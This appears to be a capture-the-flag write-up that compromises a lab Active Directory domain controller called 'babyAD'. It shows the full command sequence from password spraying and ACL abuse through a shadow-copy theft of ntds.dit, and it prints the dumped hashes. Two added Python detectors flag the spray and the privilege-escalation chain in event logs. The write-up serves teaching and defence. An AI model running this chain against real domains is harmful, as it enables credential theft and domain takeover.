babyAD
1. User
1.1. Port scan
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nmap 192.168.1.5 --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:22 EST
Nmap scan report for 192.168.1.5
Host is up (0.00037s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
MAC Address: 00:0C:29:AC:31:59 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.55 seconds

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nmap 192.168.1.5 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 06:24 EST
Nmap scan report for 192.168.1.5
Host is up (0.00051s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-03 11:24:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: babyAD.com0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 00:0C:29:AC:31:59 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: BABYAD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_nbstat: NetBIOS name: BABYAD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ac:31:59 (VMware)
| smb2-time:
|   date: 2026-01-03T11:24:33
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.76 seconds
1.2. SMB
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --shares
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\guest:
SMB   192.168.1.5   445   BABYAD   [*] Enumerated shares
SMB   192.168.1.5   445   BABYAD   Share                      Permissions   Remark
SMB   192.168.1.5   445   BABYAD   -----                      -----------   ------
SMB   192.168.1.5   445   BABYAD   ADMIN$                                   远程管理
SMB   192.168.1.5   445   BABYAD   C$                                       默认共享
SMB   192.168.1.5   445   BABYAD   IPC$                       READ          远程 IPC
SMB   192.168.1.5   445   BABYAD   NETLOGON                                 Logon server share
SMB   192.168.1.5   445   BABYAD   SYSVOL                                   Logon server share
SMB   192.168.1.5   445   BABYAD   Technical Security Notice  READ
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u '' -p '' --generate-hosts-file hosts
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\:

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] krb5 conf saved to: /etc/krb5.conf
SMB   192.168.1.5   445   BABYAD   [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\:

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# cat hosts
192.168.1.5     BABYAD.babyAD.com babyAD.com BABYAD

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-smbclient 'guest:@192.168.1.5'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
Technical Security Notice
# use 'Technical Security Notice'
# use Technical Security Notice
# ls
drw-rw-rw-          0  Fri Dec 26 23:10:12 2025 .
drw-rw-rw-          0  Fri Dec 26 23:27:54 2025 ..
-rw-rw-rw-       5045  Fri Dec 26 23:10:12 2025 技术安全通告.pdf
# get 技术安全通告.pdf
# exit
1.3. RID_Cycling
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u 'guest' -p '' --rid-brute
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\guest:
SMB   192.168.1.5   445   BABYAD   498: BABYAD0\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   500: BABYAD0\Administrator (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   501: BABYAD0\Guest (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   502: BABYAD0\krbtgt (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   512: BABYAD0\Domain Admins (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   513: BABYAD0\Domain Users (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   514: BABYAD0\Domain Guests (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   515: BABYAD0\Domain Computers (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   516: BABYAD0\Domain Controllers (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   517: BABYAD0\Cert Publishers (SidTypeAlias)
SMB   192.168.1.5   445   BABYAD   518: BABYAD0\Schema Admins (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   519: BABYAD0\Enterprise Admins (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   520: BABYAD0\Group Policy Creator Owners (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   521: BABYAD0\Read-only Domain Controllers (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   522: BABYAD0\Cloneable Domain Controllers (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   525: BABYAD0\Protected Users (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   526: BABYAD0\Key Admins (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   527: BABYAD0\Enterprise Key Admins (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   553: BABYAD0\RAS and IAS Servers (SidTypeAlias)
SMB   192.168.1.5   445   BABYAD   571: BABYAD0\Allowed RODC Password Replication Group (SidTypeAlias)
SMB   192.168.1.5   445   BABYAD   572: BABYAD0\Denied RODC Password Replication Group (SidTypeAlias)
SMB   192.168.1.5   445   BABYAD   1000: BABYAD0\BABYAD$ (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   1101: BABYAD0\DnsAdmins (SidTypeAlias)
SMB   192.168.1.5   445   BABYAD   1102: BABYAD0\DnsUpdateProxy (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   1103: BABYAD0\acc_admins (SidTypeGroup)
SMB   192.168.1.5   445   BABYAD   1104: BABYAD0\wackymaker (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   1105: BABYAD0\babyad-admin (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   1106: BABYAD0\backup-opt (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   1107: BABYAD0\server-opt (SidTypeUser)
SMB   192.168.1.5   445   BABYAD   1108: BABYAD0\accn-opt (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u valid_user.txt -p valid_user.txt --no-bruteforce
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\Administrator:Administrator STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\Guest:Guest STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\BABYAD$:BABYAD$ STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\babyad-admin:babyad-admin STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\backup-opt:backup-opt STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\server-opt:server-opt STATUS_LOGON_FAILURE
SMB   192.168.1.5   445   BABYAD   [-] babyAD.com\accn-opt:accn-opt STATUS_LOGON_FAILURE
wackymaker answers STATUS_PASSWORD_MUST_CHANGE instead of STATUS_LOGON_FAILURE: the password wackymaker is correct, it only has to be changed at first logon. So change it.
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u wackymaker -p wackymaker -M change-password -o NEWPASS=Admin123
SMB          192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB          192.168.1.5   445   BABYAD   [-] babyAD.com\wackymaker:wackymaker STATUS_PASSWORD_MUST_CHANGE
CHANGE-P...  192.168.1.5   445   BABYAD   [+] Successfully changed password for wackymaker
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u wackymaker -p Admin123
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\wackymaker:Admin123

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc winrm 192.168.1.5 -u wackymaker -p Admin123
WINRM   192.168.1.5   5985   BABYAD   [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM   192.168.1.5   5985   BABYAD   [+] babyAD.com\wackymaker:Admin123 (Pwn3d!)
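As an added example that is not part of the original writeup, this is what the username=password spray above looks like from the domain controller's side. The Python below runs over constructed Security event 4625 records (flattened here to one key=value line each, not the real event XML), flags a source that fails logons against many accounts in a short window, and singles out STATUS_PASSWORD_MUST_CHANGE responses, because the DC only returns that status after the password has already been verified.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real log output) of Security event 4625 records, flattened to
# one key=value line each, as the DC would record the username=password spray above.
# Sub Status is the NTSTATUS the DC reported: 0xC000006A = wrong password,
# 0xC0000224 = STATUS_PASSWORD_MUST_CHANGE, i.e. the password itself was accepted.
SAMPLE_4625 = """\
2026-01-03T11:30:01 EventID=4625 TargetUserName=Administrator IpAddress=192.168.1.10 SubStatus=0xC000006A
2026-01-03T11:30:01 EventID=4625 TargetUserName=Guest IpAddress=192.168.1.10 SubStatus=0xC000006A
2026-01-03T11:30:02 EventID=4625 TargetUserName=krbtgt IpAddress=192.168.1.10 SubStatus=0xC000006A
2026-01-03T11:30:02 EventID=4625 TargetUserName=wackymaker IpAddress=192.168.1.10 SubStatus=0xC0000224
2026-01-03T11:30:03 EventID=4625 TargetUserName=babyad-admin IpAddress=192.168.1.10 SubStatus=0xC000006A
2026-01-03T11:30:03 EventID=4625 TargetUserName=backup-opt IpAddress=192.168.1.10 SubStatus=0xC000006A
2026-01-03T11:45:00 EventID=4625 TargetUserName=server-opt IpAddress=192.168.1.20 SubStatus=0xC000006A
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=4625 TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) SubStatus=(?P<sub>0x[0-9A-Fa-f]{8})$"
)
STATUS_PASSWORD_MUST_CHANGE = 0xC0000224


def parse_4625(text):
    """Return the 4625 records in `text` as dicts; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "user": m["user"].lower(),
                           "ip": m["ip"], "sub": int(m["sub"], 16)})
    return events


def detect_spray(text, window=timedelta(minutes=5), min_accounts=5):
    """Map each source IP that failed logons against >= min_accounts distinct accounts
    within `window` to the accounts it tried and those whose password it confirmed."""
    by_ip = defaultdict(list)
    for ev in parse_4625(text):
        by_ip[ev["ip"]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:  # shrink to fit the window
                start += 1
            burst = evs[start:end + 1]
            accounts = sorted({e["user"] for e in burst})
            if len(accounts) >= min_accounts and len(accounts) > len(
                    findings.get(ip, {}).get("accounts", [])):
                findings[ip] = {
                    "accounts": accounts,
                    # PASSWORD_MUST_CHANGE is only returned once the password verified,
                    # so the sprayer now holds a working credential for these accounts
                    "valid_credentials": sorted({e["user"] for e in burst
                                                 if e["sub"] == STATUS_PASSWORD_MUST_CHANGE}),
                }
    return findings
```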
1.4. winrm
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u wackymaker -p Admin123

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\wackymaker\Documents> whoami;hostname
babyad0\wackymaker
babyAD
*Evil-WinRM* PS C:\Users\wackymaker\Documents>
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir
*Evil-WinRM* PS C:\Users\wackymaker\desktop> gci -path c:\users user.txt

    目录: C:\users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         12/27/2025  11:55 AM             18 user.txt

*Evil-WinRM* PS C:\Users\wackymaker\desktop> gc c:\users\user.txt
a3f5c9e47d2b1a8f
2. System
2.1. bloodhound
*Evil-WinRM* PS C:\Users\wackymaker\desktop> upload SharpHound.exe

Info: Uploading /root/Desktop/machines/babyAD/SharpHound.exe to C:\Users\wackymaker\desktop\SharpHound.exe

Data: 1748308 bytes of 1748308 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> .\SharpHound.exe -c ALL
2026-01-03T20:09:25.0406600+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-01-03T20:09:25.1812350+08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-03T20:09:25.2125237+08:00|INFORMATION|Initializing SharpHound at 20:09 on 2026/1/3
2026-01-03T20:09:25.2437172+08:00|INFORMATION|Resolved current domain to babyAD.com
2026-01-03T20:09:25.3542563+08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-03T20:09:25.4166617+08:00|INFORMATION|Beginning LDAP search for babyAD.com
...
2026-01-03T20:09:31.8660681+08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Status: 299 objects finished (+299 49.83333)/s -- Using 72 MB RAM
2026-01-03T20:09:31.9288670+08:00|INFORMATION|Enumeration finished in 00:00:06.5298466
2026-01-03T20:09:32.0071000+08:00|INFORMATION|Saving cache with stats: 20 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 3 sid to domain mappings.
 0 global catalog mappings.
2026-01-03T20:09:32.0227859+08:00|INFORMATION|SharpHound Enumeration Completed at 20:09 on 2026/1/3! Happy Graphing!
*Evil-WinRM* PS C:\Users\wackymaker\desktop> dir

    目录: C:\Users\wackymaker\desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----           1/3/2026   8:09 PM          28121 20260103200926_BloodHound.zip
-a----           1/3/2026   8:09 PM           1566 N2Q4YzlmOWUtOGQxOC00ZmNiLTkzZjktNmJkOGZlYmQ5MzM4.bin
-a----           1/3/2026   8:09 PM        1311232 SharpHound.exe

*Evil-WinRM* PS C:\Users\wackymaker\desktop> download 20260103200926_BloodHound.zip

Info: Downloading C:\Users\wackymaker\desktop\20260103200926_BloodHound.zip to 20260103200926_BloodHound.zip

Info: Download successful!
First add wackymaker to the ACC_ADMINS group: take ownership of the group, grant ourselves GenericAll on it, then add the member.
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 set owner 'ACC_ADMINS' 'wackymaker'
[+] Old owner S-1-5-21-3649830887-1815587496-1699028491-512 is now replaced by wackymaker on ACC_ADMINS

┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add genericAll 'ACC_ADMINS' 'wackymaker'
[+] wackymaker has now GenericAll on ACC_ADMINS

┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host BABYAD.babyAD.com -d babyAD.com -u 'wackymaker' -p 'Admin123' -k --dc-ip 192.168.1.5 add groupMember 'ACC_ADMINS' 'wackymaker'
[+] wackymaker added to ACC_ADMINS
Then reset BABYAD-ADMIN's password.
┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'wackymaker' -p 'Admin123' set password BABYAD-ADMIN Admin123
[+] Password changed successfully!

┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc smb 192.168.1.5 -u BABYAD-ADMIN -p Admin123
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\BABYAD-ADMIN:Admin123

┌──(root㉿kali)-[~/Desktop/machines/babyAD/ansi-colors]
└─# nxc winrm 192.168.1.5 -u BABYAD-ADMIN -p Admin123
WINRM   192.168.1.5   5985   BABYAD   [*] Windows Server 2022 Build 20348 (name:BABYAD) (domain:babyAD.com)
WINRM   192.168.1.5   5985   BABYAD   [+] babyAD.com\BABYAD-ADMIN:Admin123 (Pwn3d!)
With BABYAD-ADMIN, reset BACKUP-OPT's password the same way:

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# bloodyAD --host BABYAD.babyAD.com -k --dc-ip 192.168.1.5 -d babyAD.com -u 'BABYAD-ADMIN' -p 'Admin123' set password BACKUP-OPT Admin123
[+] Password changed successfully!

┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# nxc smb 192.168.1.5 -u BACKUP-OPT -p Admin123
SMB   192.168.1.5   445   BABYAD   [*] Windows Server 2022 Build 20348 x64 (name:BABYAD) (domain:babyAD.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   192.168.1.5   445   BABYAD   [+] babyAD.com\BACKUP-OPT:Admin123
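The owner change, the GenericAll grant, the self-add and the two password resets above each leave a record in the DC's Security log (5136 for the nTSecurityDescriptor writes where the group's SACL audits them, 4728 for the group membership add, 4724 for the resets). As an added example that is not part of the original writeup, the Python below correlates constructed, flattened versions of those events to surface exactly this chain; the one-line key=value layout and the 30-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed Security events (not real log output) flattened to one key=value line each.
# 5136 = directory service object modified, 4728 = member added to a security-enabled
# global group, 4724 = password reset attempt. Subject is the principal acting, Target the
# object acted on. The first five lines mirror the bloodyAD sequence above; the last is
# benign noise.
SAMPLE_EVENTS = """\
2026-01-03T12:00:00 EventID=5136 Subject=wackymaker Target=ACC_ADMINS Attribute=nTSecurityDescriptor
2026-01-03T12:00:05 EventID=5136 Subject=wackymaker Target=ACC_ADMINS Attribute=nTSecurityDescriptor
2026-01-03T12:00:09 EventID=4728 Subject=wackymaker Target=ACC_ADMINS Member=wackymaker
2026-01-03T12:01:30 EventID=4724 Subject=wackymaker Target=babyad-admin
2026-01-03T12:02:10 EventID=4724 Subject=babyad-admin Target=backup-opt
2026-01-03T09:15:00 EventID=4728 Subject=administrator Target=DnsAdmins Member=server-opt
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Parse the flattened records into dicts, oldest first; names are lower-cased."""
    events = []
    for line in text.splitlines():
        ts, _, rest = line.partition(" ")
        fields = dict(FIELD_RE.findall(rest))
        if "EventID" not in fields:
            continue
        ev = {k: v.lower() for k, v in fields.items()}
        ev["EventID"] = int(fields["EventID"])
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def correlate(text, window=timedelta(minutes=30)):
    """Return findings as tuples:
    ("acl_then_self_add", subject, group): subject rewrote the group's security
        descriptor (owner/DACL) and then added itself to the group;
    ("self_add", subject, group): self-add without a preceding descriptor change;
    ("reset_chain", a, b, c): a reset b's password and b then reset c's."""
    events = parse_events(text)
    findings = []
    for i, ev in enumerate(events):
        recent = [e for e in events[:i] if ev["ts"] - e["ts"] <= window]
        if ev["EventID"] == 4728 and ev.get("Member") == ev["Subject"]:
            tampered = any(e["EventID"] == 5136 and e["Subject"] == ev["Subject"]
                           and e["Target"] == ev["Target"]
                           and e.get("Attribute") == "ntsecuritydescriptor"
                           for e in recent)
            findings.append(("acl_then_self_add" if tampered else "self_add",
                             ev["Subject"], ev["Target"]))
        if ev["EventID"] == 4724:
            for e in recent:
                if e["EventID"] == 4724 and e["Target"] == ev["Subject"]:
                    findings.append(("reset_chain", e["Subject"], ev["Subject"], ev["Target"]))
    return findings
```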
*Evil-WinRM* PS C:\Users\backup-opt\Documents> whoami /priv

特权信息
----------------------

特权名                        描述             状态
============================= ================ ======
SeMachineAccountPrivilege     将工作站添加到域 已启用
SeBackupPrivilege             备份文件和目录   已启用
SeRestorePrivilege            还原文件和目录   已启用
SeShutdownPrivilege           关闭系统         已启用
SeChangeNotifyPrivilege       绕过遍历检查     已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集   已启用
*Evil-WinRM* PS C:\Users\backup-opt\Documents>
2.2. Volume shadow copy
backup-opt holds SeBackupPrivilege, so it can snapshot C: with diskshadow, expose the copy as z:, and copy ntds.dit out of it with robocopy /b (backup mode); the SYSTEM hive is saved as well, since it holds the boot key needed to decrypt the hashes.
*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh
Microsoft DiskShadow 版本 1.0
版权所有 (C) 2013 Microsoft Corporation
在计算机上:  BABYAD,2026/1/3 23:26:01

-> set context persistent nowriters
-> add volume c: alias raj
-> create
已将卷影 ID {c517776e-4909-438e-939e-9075f39a773a} 的别名 raj 设置为环境变量。
已将卷影集 ID {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的别名 VSS_SHADOW_SET 设置为环境变量。

正在查询卷影副本集 ID 为 {eeb0e07c-db9d-4383-8ea8-e717ceec7542} 的所有卷影副本

        * 卷影副本 ID = {c517776e-4909-438e-939e-9075f39a773a}               %raj%
                - 卷影副本集: {eeb0e07c-db9d-4383-8ea8-e717ceec7542}       %VSS_SHADOW_SET%
                - 卷影副本原始数 = 1
                - 原始卷名称: \\?\Volume{ed91bad1-0000-0000-0000-500600000000}\ [C:\]
                - 创建时间: 2026/1/3 23:26:01
                - 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - 原始计算机: babyAD.babyAD.com
                - 服务计算机: babyAD.babyAD.com
                - 未暴露
                - 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - 属性:  No_Auto_Release Persistent No_Writers Differential

已列出的卷影副本数: 1
-> expose %raj% z:
-> %raj% = {c517776e-4909-438e-939e-9075f39a773a}
已成功将卷影副本暴露为 z:\。
->
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Windows 的可靠文件复制
-------------------------------------------------------------------------------

  开始时间: 2026年1月3日 23:26:10
       源: z:\windows\ntds\
     目标: C:\temp\

    文件: ntds.dit

    选项: /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            新文件              16.0 m        ntds.dit
  0.0%  0.3%  0.7%  1.1%  1.5%  1.9%  2.3%  2.7%  ...

------------------------------------------------------------------------------

               总数      复制      跳过    不匹配      失败      其他
    目录:         1         0         1         0         0         0
    文件:         1         1         0         0         0         0
    字节:   16.00 m   16.00 m         0         0         0         0
    时间:   0:00:00   0:00:00                       0:00:00   0:00:00

    速度:           270,600,258 字节/秒。
    速度:           15,483.871 MB/分钟。
  已结束: 2026年1月3日 23:26:10

*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
操作成功完成。
*Evil-WinRM* PS C:\temp> cd C:\Temp
*Evil-WinRM* PS C:\Temp> download ntds.dit

Info: Downloading C:\Temp\ntds.dit to ntds.dit

Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system

Info: Downloading C:\Temp\system to system

Info: Download successful!
*Evil-WinRM* PS C:\Temp>
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ca0a78b7f0d8e8d570163049c1742318
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYAD$:1000:aad3b435b51404eeaad3b435b51404ee:1eb9a569e97548b6a4629f64979a193c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6fab09b974ecbb7ba5447a076f494689:::
wackymaker:1104:aad3b435b51404eeaad3b435b51404ee:838e18ea954162b03ddea84fa0284139:::
babyad.com\babyad-admin:1105:aad3b435b51404eeaad3b435b51404ee:656d231c131a8f1ea8fd1138b8185674:::
backup-opt:1106:aad3b435b51404eeaad3b435b51404ee:5ad41e36af059c77865edbc22925c33c:::
server-opt:1107:aad3b435b51404eeaad3b435b51404ee:d99f9d8da6dad6dcae6b0d96104a445b:::
accn-opt:1108:aad3b435b51404eeaad3b435b51404ee:b9a7a7fcc60bdb049811e7c7388112a3:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574
Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128
Administrator:des-cbc-md5:34701ccb6efb9704
BABYAD$:aes256-cts-hmac-sha1-96:37cbade9fb078f11a30748756fd92ff7c64af78ca036f546c7ee10326ee3cf20
BABYAD$:aes128-cts-hmac-sha1-96:d896106e4587e25cb645b44c5f2aef0c
BABYAD$:des-cbc-md5:d3b02ac8106ba89e
krbtgt:aes256-cts-hmac-sha1-96:d24121bf2b99d3645b4d7360107674ba6e9f3c55ba79d3d508906e29f1e8a81e
krbtgt:aes128-cts-hmac-sha1-96:5ed92e70800a8bc3da8e8a9220807d5e
krbtgt:des-cbc-md5:2546020262f197a7
wackymaker:aes256-cts-hmac-sha1-96:9f8fc1b72c86c3881697938460386a078d0e062c07773f60961b5ef037571977
wackymaker:aes128-cts-hmac-sha1-96:2ef671fea3cbc6a11689c264636cf316
wackymaker:des-cbc-md5:0b7a079edae54c9e
